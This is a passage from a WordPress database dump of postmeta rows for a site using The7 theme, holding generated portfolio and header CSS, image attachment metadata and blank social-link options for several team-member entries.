{\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(29159,3910,'_edit_lock','1677711856:1'),
(29160,3911,'_wp_attached_file','2023/03/w292.jpg'),
(29161,3911,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:114;s:6:\"height\";i:114;s:4:\"file\";s:16:\"2023/03/w292.jpg\";s:8:\"filesize\";i:7639;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29162,3910,'_thumbnail_id','3911'),
(29163,3910,'_edit_last','1'),
(29164,3910,'_dt_sidebar_position','disabled'),
(29165,3910,'_dt_sidebar_widgetarea_id','sidebar_1'),
(29166,3910,'_dt_sidebar_hide_on_mobile','0'),
(29167,3910,'_dt_footer_show','0'),
(29168,3910,'_dt_footer_widgetarea_id','sidebar_2'),
(29169,3910,'_dt_footer_hide_on_mobile','0'),
(29170,3910,'_dt_header_title','fancy'),
(29171,3910,'_dt_header_background','normal'),
(29172,3910,'_dt_header_background_below_slideshow','disabled'),
(29173,3910,'_dt_header_transparent_bg_color_scheme','light'),
(29174,3910,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(29175,3910,'_dt_header_transparent_top_bar_bg_opacity','25'),
(29176,3910,'_dt_header_transparent_bg_color','#000000'),
(29177,3910,'_dt_header_transparent_bg_opacity','50'),
(29178,3910,'_dt_header_disabled_background','normal'),
(29179,3910,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(29180,3910,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(29181,3910,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(29182,3910,'_dt_header_disabled_transparent_bg_color','#000000'),
(29183,3910,'_dt_header_disabled_transparent_bg_opacity','50'),
(29184,3910,'_dt_page_overrides_top_margin',''),
(29185,3910,'_dt_page_overrides_right_margin',''),
(29186,3910,'_dt_page_overrides_bottom_margin',''),
(29187,3910,'_dt_page_overrides_left_margin',''),
(29188,3910,'_dt_mobile_page_padding_top',''),
(29189,3910,'_dt_mobile_page_padding_right',''),
(29190,3910,'_dt_mobile_page_padding_bottom',''),
(29191,3910,'_dt_mobile_page_padding_left',''),
(29192,3910,'_dt_fancy_header_layout_heading',''),
(29193,3910,'_dt_fancy_header_title_aligment','center'),
(29194,3910,'_dt_fancy_header_height','300'),
(29195,3910,'_dt_fancy_header_padding-top','0px'),
(29196,3910,'_dt_fancy_header_padding-bottom','0px'),
(29197,3910,'_dt_fancy_header_breadcrumbs_heading',''),
(29198,3910,'_dt_fancy_header_breadcrumbs','disabled'),
(29199,3910,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(29200,3910,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(29201,3910,'_dt_fancy_header_title_heading',''),
(29202,3910,'_dt_fancy_header_title_mode','generic'),
(29203,3910,'_dt_fancy_header_title',''),
(29204,3910,'_dt_fancy_header_title_font_size','30'),
(29205,3910,'_dt_fancy_header_title_line_height','36'),
(29206,3910,'_dt_fancy_header_text_transform','none'),
(29207,3910,'_dt_fancy_header_title_color_mode','color'),
(29208,3910,'_dt_fancy_header_title_color','#ffffff'),
(29209,3910,'_dt_fancy_header_subtitle_heading',''),
(29210,3910,'_dt_fancy_header_subtitle',''),
(29211,3910,'_dt_fancy_header_subtitle_font_size','18'),
(29212,3910,'_dt_fancy_header_subtitle_line_height','26'),
(29213,3910,'_dt_fancy_header_subtitle_text_transform','none'),
(29214,3910,'_dt_fancy_header_subtitle_color_mode','color'),
(29215,3910,'_dt_fancy_header_subtitle_color','#ffffff'),
(29216,3910,'_dt_fancy_header_bg_heading',''),
(29217,3910,'_dt_fancy_header_bg_color','#222222'),
(29218,3910,'_dt_fancy_header_bg_image_origin','custom'),
(29219,3910,'_dt_fancy_header_bg_image','a:0:{}'),
(29220,3910,'_dt_fancy_header_bg_repeat','no-repeat'),
(29221,3910,'_dt_fancy_header_bg_position_x','center'),
(29222,3910,'_dt_fancy_header_bg_position_y','center'),
(29223,3910,'_dt_fancy_header_bg_fullscreen','1'),
(29224,3910,'_dt_fancy_header_bg_overlay','0'),
(29225,3910,'_dt_fancy_header_overlay_color','#000'),
(29226,3910,'_dt_fancy_header_bg_overlay_opacity','50'),
(29227,3910,'_dt_fancy_header_scroll_effect','default'),
(29228,3910,'_dt_fancy_header_bg_parallax','0.5'),
(29229,3910,'_dt_fancy_header_responsiveness_heading',''),
(29230,3910,'_dt_fancy_header_responsiveness','disabled'),
(29231,3910,'_dt_fancy_header_responsiveness_switch','778px'),
(29232,3910,'_dt_fancy_header_responsive_height','70'),
(29233,3910,'_dt_fancy_header_responsive_font_size','30'),
(29234,3910,'_dt_fancy_header_responsive_title_line_height','38'),
(29235,3910,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29236,3910,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29237,3910,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29238,3910,'_dt_teammate_options_go_to_single','1'),
(29239,3910,'_dt_teammate_options_position',''),
(29240,3910,'_dt_teammate_options_website',''),
(29241,3910,'_dt_teammate_options_mail',''),
(29242,3910,'_dt_teammate_options_facebook',''),
(29243,3910,'_dt_teammate_options_twitter',''),
(29244,3910,'_dt_teammate_options_dribbble',''),
(29245,3910,'_dt_teammate_options_you-tube',''),
(29246,3910,'_dt_teammate_options_rss',''),
(29247,3910,'_dt_teammate_options_delicious',''),
(29248,3910,'_dt_teammate_options_flickr',''),
(29249,3910,'_dt_teammate_options_lastfm',''),
(29250,3910,'_dt_teammate_options_linkedin',''),
(29251,3910,'_dt_teammate_options_vimeo',''),
(29252,3910,'_dt_teammate_options_tumbler',''),
(29253,3910,'_dt_teammate_options_pinterest',''),
(29254,3910,'_dt_teammate_options_devian',''),
(29255,3910,'_dt_teammate_options_skype',''),
(29256,3910,'_dt_teammate_options_github',''),
(29257,3910,'_dt_teammate_options_instagram',''),
(29258,3910,'_dt_teammate_options_stumbleupon',''),
(29259,3910,'_dt_teammate_options_behance',''),
(29260,3910,'_dt_teammate_options_px-500',''),
(29261,3910,'_dt_teammate_options_tripedvisor',''),
(29262,3910,'_dt_teammate_options_vk',''),
(29263,3910,'_dt_teammate_options_foursquare',''),
(29264,3910,'_dt_teammate_options_xing',''),
(29265,3910,'_dt_teammate_options_weibo',''),
(29266,3910,'_dt_teammate_options_odnoklassniki',''),
(29267,3910,'_dt_teammate_options_research-gate',''),
(29268,3910,'_dt_teammate_options_yelp',''),
(29269,3910,'_dt_teammate_options_blogger',''),
(29270,3910,'_dt_teammate_options_soundcloud',''),
(29271,3910,'_dt_teammate_options_viber',''),
(29272,3910,'_dt_teammate_options_whatsapp',''),
(29273,3910,'_dt_teammate_options_reddit',''),
(29274,3910,'_dt_teammate_options_snapchat',''),
(29275,3910,'_dt_teammate_options_telegram',''),
(29276,3910,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29277,3912,'_edit_lock','1677711932:1'),
(29278,3913,'_wp_attached_file','2023/03/w293.jpg'),
(29279,3913,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:114;s:6:\"height\";i:114;s:4:\"file\";s:16:\"2023/03/w293.jpg\";s:8:\"filesize\";i:4504;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29280,3912,'_thumbnail_id','3913'),
(29281,3912,'_edit_last','1'),
(29282,3912,'_dt_sidebar_position','disabled'),
(29283,3912,'_dt_sidebar_widgetarea_id','sidebar_1'),
(29284,3912,'_dt_sidebar_hide_on_mobile','0'),
(29285,3912,'_dt_footer_show','0'),
(29286,3912,'_dt_footer_widgetarea_id','sidebar_2'),
(29287,3912,'_dt_footer_hide_on_mobile','0'),
(29288,3912,'_dt_header_title','fancy'),
(29289,3912,'_dt_header_background','normal'),
(29290,3912,'_dt_header_background_below_slideshow','disabled'),
(29291,3912,'_dt_header_transparent_bg_color_scheme','light'),
(29292,3912,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(29293,3912,'_dt_header_transparent_top_bar_bg_opacity','25'),
(29294,3912,'_dt_header_transparent_bg_color','#000000'),
(29295,3912,'_dt_header_transparent_bg_opacity','50'),
(29296,3912,'_dt_header_disabled_background','normal'),
(29297,3912,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(29298,3912,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(29299,3912,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(29300,3912,'_dt_header_disabled_transparent_bg_color','#000000'),
(29301,3912,'_dt_header_disabled_transparent_bg_opacity','50'),
(29302,3912,'_dt_page_overrides_top_margin',''),
(29303,3912,'_dt_page_overrides_right_margin',''),
(29304,3912,'_dt_page_overrides_bottom_margin',''),
(29305,3912,'_dt_page_overrides_left_margin',''),
(29306,3912,'_dt_mobile_page_padding_top',''),
(29307,3912,'_dt_mobile_page_padding_right',''),
(29308,3912,'_dt_mobile_page_padding_bottom',''),
(29309,3912,'_dt_mobile_page_padding_left',''),
(29310,3912,'_dt_fancy_header_layout_heading',''),
(29311,3912,'_dt_fancy_header_title_aligment','center'),
(29312,3912,'_dt_fancy_header_height','300'),
(29313,3912,'_dt_fancy_header_padding-top','0px'),
(29314,3912,'_dt_fancy_header_padding-bottom','0px'),
(29315,3912,'_dt_fancy_header_breadcrumbs_heading',''),
(29316,3912,'_dt_fancy_header_breadcrumbs','disabled'),
(29317,3912,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(29318,3912,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(29319,3912,'_dt_fancy_header_title_heading',''),
(29320,3912,'_dt_fancy_header_title_mode','generic'),
(29321,3912,'_dt_fancy_header_title',''),
(29322,3912,'_dt_fancy_header_title_font_size','30'),
(29323,3912,'_dt_fancy_header_title_line_height','36'),
(29324,3912,'_dt_fancy_header_text_transform','none'),
(29325,3912,'_dt_fancy_header_title_color_mode','color'),
(29326,3912,'_dt_fancy_header_title_color','#ffffff'),
(29327,3912,'_dt_fancy_header_subtitle_heading',''),
(29328,3912,'_dt_fancy_header_subtitle',''),
(29329,3912,'_dt_fancy_header_subtitle_font_size','18'),
(29330,3912,'_dt_fancy_header_subtitle_line_height','26'),
(29331,3912,'_dt_fancy_header_subtitle_text_transform','none'),
(29332,3912,'_dt_fancy_header_subtitle_color_mode','color'),
(29333,3912,'_dt_fancy_header_subtitle_color','#ffffff'),
(29334,3912,'_dt_fancy_header_bg_heading',''),
(29335,3912,'_dt_fancy_header_bg_color','#222222'),
(29336,3912,'_dt_fancy_header_bg_image_origin','custom'),
(29337,3912,'_dt_fancy_header_bg_image','a:0:{}'),
(29338,3912,'_dt_fancy_header_bg_repeat','no-repeat'),
(29339,3912,'_dt_fancy_header_bg_position_x','center'),
(29340,3912,'_dt_fancy_header_bg_position_y','center'),
(29341,3912,'_dt_fancy_header_bg_fullscreen','1'),
(29342,3912,'_dt_fancy_header_bg_overlay','0'),
(29343,3912,'_dt_fancy_header_overlay_color','#000'),
(29344,3912,'_dt_fancy_header_bg_overlay_opacity','50'),
(29345,3912,'_dt_fancy_header_scroll_effect','default'),
(29346,3912,'_dt_fancy_header_bg_parallax','0.5'),
(29347,3912,'_dt_fancy_header_responsiveness_heading',''),
(29348,3912,'_dt_fancy_header_responsiveness','disabled'),
(29349,3912,'_dt_fancy_header_responsiveness_switch','778px'),
(29350,3912,'_dt_fancy_header_responsive_height','70'),
(29351,3912,'_dt_fancy_header_responsive_font_size','30'),
(29352,3912,'_dt_fancy_header_responsive_title_line_height','38'),
(29353,3912,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29354,3912,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29355,3912,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29356,3912,'_dt_teammate_options_go_to_single','1'),
(29357,3912,'_dt_teammate_options_position',''),
(29358,3912,'_dt_teammate_options_website',''),
(29359,3912,'_dt_teammate_options_mail',''),
(29360,3912,'_dt_teammate_options_facebook',''),
(29361,3912,'_dt_teammate_options_twitter',''),
(29362,3912,'_dt_teammate_options_dribbble',''),
(29363,3912,'_dt_teammate_options_you-tube',''),
(29364,3912,'_dt_teammate_options_rss',''),
(29365,3912,'_dt_teammate_options_delicious',''),
(29366,3912,'_dt_teammate_options_flickr',''),
(29367,3912,'_dt_teammate_options_lastfm',''),
(29368,3912,'_dt_teammate_options_linkedin',''),
(29369,3912,'_dt_teammate_options_vimeo',''),
(29370,3912,'_dt_teammate_options_tumbler',''),
(29371,3912,'_dt_teammate_options_pinterest',''),
(29372,3912,'_dt_teammate_options_devian',''),
(29373,3912,'_dt_teammate_options_skype',''),
(29374,3912,'_dt_teammate_options_github',''),
(29375,3912,'_dt_teammate_options_instagram',''),
(29376,3912,'_dt_teammate_options_stumbleupon',''),
(29377,3912,'_dt_teammate_options_behance',''),
(29378,3912,'_dt_teammate_options_px-500',''),
(29379,3912,'_dt_teammate_options_tripedvisor',''),
(29380,3912,'_dt_teammate_options_vk',''),
(29381,3912,'_dt_teammate_options_foursquare',''),
(29382,3912,'_dt_teammate_options_xing',''),
(29383,3912,'_dt_teammate_options_weibo',''),
(29384,3912,'_dt_teammate_options_odnoklassniki',''),
(29385,3912,'_dt_teammate_options_research-gate',''),
(29386,3912,'_dt_teammate_options_yelp',''),
(29387,3912,'_dt_teammate_options_blogger',''),
(29388,3912,'_dt_teammate_options_soundcloud',''),
(29389,3912,'_dt_teammate_options_viber',''),
(29390,3912,'_dt_teammate_options_whatsapp',''),
(29391,3912,'_dt_teammate_options_reddit',''),
(29392,3912,'_dt_teammate_options_snapchat',''),
(29393,3912,'_dt_teammate_options_telegram',''),
(29394,3912,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(29395,3914,'_edit_lock','1677712011:1'),
(29396,3915,'_wp_attached_file','2023/03/w294.jpg'),
(29397,3915,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:112;s:6:\"height\";i:131;s:4:\"file\";s:16:\"2023/03/w294.jpg\";s:8:\"filesize\";i:4892;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29398,3914,'_thumbnail_id','3915'),
(29399,3914,'_edit_last','1'),
(29400,3914,'_dt_sidebar_position','disabled'),
(29401,3914,'_dt_sidebar_widgetarea_id','sidebar_1'),
(29402,3914,'_dt_sidebar_hide_on_mobile','0'),
(29403,3914,'_dt_footer_show','0'),
(29404,3914,'_dt_footer_widgetarea_id','sidebar_2'),
(29405,3914,'_dt_footer_hide_on_mobile','0'),
(29406,3914,'_dt_header_title','fancy'),
(29407,3914,'_dt_header_background','normal'),
(29408,3914,'_dt_header_background_below_slideshow','disabled'),
(29409,3914,'_dt_header_transparent_bg_color_scheme','light'),
(29410,3914,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(29411,3914,'_dt_header_transparent_top_bar_bg_opacity','25'),
(29412,3914,'_dt_header_transparent_bg_color','#000000'),
(29413,3914,'_dt_header_transparent_bg_opacity','50'),
(29414,3914,'_dt_header_disabled_background','normal'),
(29415,3914,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(29416,3914,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(29417,3914,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(29418,3914,'_dt_header_disabled_transparent_bg_color','#000000'),
(29419,3914,'_dt_header_disabled_transparent_bg_opacity','50'),
(29420,3914,'_dt_page_overrides_top_margin',''),
(29421,3914,'_dt_page_overrides_right_margin',''),
(29422,3914,'_dt_page_overrides_bottom_margin',''),
(29423,3914,'_dt_page_overrides_left_margin',''),
(29424,3914,'_dt_mobile_page_padding_top',''),
(29425,3914,'_dt_mobile_page_padding_right',''),
(29426,3914,'_dt_mobile_page_padding_bottom',''),
(29427,3914,'_dt_mobile_page_padding_left',''),
(29428,3914,'_dt_fancy_header_layout_heading',''),
(29429,3914,'_dt_fancy_header_title_aligment','center'),
(29430,3914,'_dt_fancy_header_height','300'),
(29431,3914,'_dt_fancy_header_padding-top','0px'),
(29432,3914,'_dt_fancy_header_padding-bottom','0px'),
(29433,3914,'_dt_fancy_header_breadcrumbs_heading',''),
(29434,3914,'_dt_fancy_header_breadcrumbs','disabled'),
(29435,3914,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(29436,3914,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(29437,3914,'_dt_fancy_header_title_heading',''),
(29438,3914,'_dt_fancy_header_title_mode','generic'),
(29439,3914,'_dt_fancy_header_title',''),
(29440,3914,'_dt_fancy_header_title_font_size','30'),
(29441,3914,'_dt_fancy_header_title_line_height','36'),
(29442,3914,'_dt_fancy_header_text_transform','none'),
(29443,3914,'_dt_fancy_header_title_color_mode','color'),
(29444,3914,'_dt_fancy_header_title_color','#ffffff'),
(29445,3914,'_dt_fancy_header_subtitle_heading',''),
(29446,3914,'_dt_fancy_header_subtitle',''),
(29447,3914,'_dt_fancy_header_subtitle_font_size','18'),
(29448,3914,'_dt_fancy_header_subtitle_line_height','26'),
(29449,3914,'_dt_fancy_header_subtitle_text_transform','none'),
(29450,3914,'_dt_fancy_header_subtitle_color_mode','color'),
(29451,3914,'_dt_fancy_header_subtitle_color','#ffffff'),
(29452,3914,'_dt_fancy_header_bg_heading',''),
(29453,3914,'_dt_fancy_header_bg_color','#222222'),
(29454,3914,'_dt_fancy_header_bg_image_origin','custom'),
(29455,3914,'_dt_fancy_header_bg_image','a:0:{}'),
(29456,3914,'_dt_fancy_header_bg_repeat','no-repeat'),
(29457,3914,'_dt_fancy_header_bg_position_x','center'),
(29458,3914,'_dt_fancy_header_bg_position_y','center'),
(29459,3914,'_dt_fancy_header_bg_fullscreen','1'),
(29460,3914,'_dt_fancy_header_bg_overlay','0'),
(29461,3914,'_dt_fancy_header_overlay_color','#000'),
(29462,3914,'_dt_fancy_header_bg_overlay_opacity','50'),
(29463,3914,'_dt_fancy_header_scroll_effect','default'),
(29464,3914,'_dt_fancy_header_bg_parallax','0.5'),
(29465,3914,'_dt_fancy_header_responsiveness_heading',''),
(29466,3914,'_dt_fancy_header_responsiveness','disabled'),
(29467,3914,'_dt_fancy_header_responsiveness_switch','778px'),
(29468,3914,'_dt_fancy_header_responsive_height','70'),
(29469,3914,'_dt_fancy_header_responsive_font_size','30'),
(29470,3914,'_dt_fancy_header_responsive_title_line_height','38'),
(29471,3914,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(29472,3914,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(29473,3914,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(29474,3914,'_dt_teammate_options_go_to_single','1'),
(29475,3914,'_dt_teammate_options_position',''),
(29476,3914,'_dt_teammate_options_website',''),
(29477,3914,'_dt_teammate_options_mail',''),
(29478,3914,'_dt_teammate_options_facebook',''),
(29479,3914,'_dt_teammate_options_twitter',''),
(29480,3914,'_dt_teammate_options_dribbble',''),
(29481,3914,'_dt_teammate_options_you-tube',''),
(29482,3914,'_dt_teammate_options_rss',''),
(29483,3914,'_dt_teammate_options_delicious',''),
(29484,3914,'_dt_teammate_options_flickr',''),
(29485,3914,'_dt_teammate_options_lastfm',''),
(29486,3914,'_dt_teammate_options_linkedin',''),
(29487,3914,'_dt_teammate_options_vimeo',''),
(29488,3914,'_dt_teammate_options_tumbler',''),
(29489,3914,'_dt_teammate_options_pinterest',''),
(29490,3914,'_dt_teammate_options_devian',''),
(29491,3914,'_dt_teammate_options_skype',''),
(29492,3914,'_dt_teammate_options_github',''),
(29493,3914,'_dt_teammate_options_instagram',''),
(29494,3914,'_dt_teammate_options_stumbleupon',''),
(29495,3914,'_dt_teammate_options_behance',''),
(29496,3914,'_dt_teammate_options_px-500',''),
(29497,3914,'_dt_teammate_options_tripedvisor',''),
(29498,3914,'_dt_teammate_options_vk',''),
(29499,3914,'_dt_teammate_options_foursquare',''),
(29500,3914,'_dt_teammate_options_xing',''),
(29501,3914,'_dt_teammate_options_weibo',''),
(29502,3914,'_dt_teammate_options_odnoklassniki',''),
(29503,3914,'_dt_teammate_options_research-gate',''),
(29504,3914,'_dt_teammate_options_yelp',''),
(29505,3914,'_dt_teammate_options_blogger',''),
(29506,3914,'_dt_teammate_options_soundcloud',''),
(29507,3914,'_dt_teammate_options_viber',''),
(29508,3914,'_dt_teammate_options_whatsapp',''),
(29509,3914,'_dt_teammate_options_reddit',''),
(29510,3914,'_dt_teammate_options_snapchat',''),
(29511,3914,'_dt_teammate_options_telegram',''),
